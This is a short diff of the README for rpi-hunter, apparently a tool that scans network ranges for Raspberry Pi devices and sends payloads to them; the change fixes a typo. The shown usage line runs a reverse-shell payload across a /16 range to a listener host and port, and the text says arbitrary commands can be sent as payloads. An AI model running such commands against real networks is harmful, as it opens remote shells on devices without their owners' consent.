BusesCanFly/rpi-hunter/README.md

 ```
 * Example usage: `./rpi-hunter.py -r 192.168.0.0/16 --payload reverse_shell -H 127.0.0.1 -P 1337`
 * Run `./rpi-hunter.py --list` to see avalible payloads.
-* Payloads can be specified by the payload name from `--list` or as raw iput
+* Payloads can be specified by the payload name from `--list` or as raw input
     * ex. `--payload reverse_shell` or `--payload [your cli command here]`

 ## Disclaimer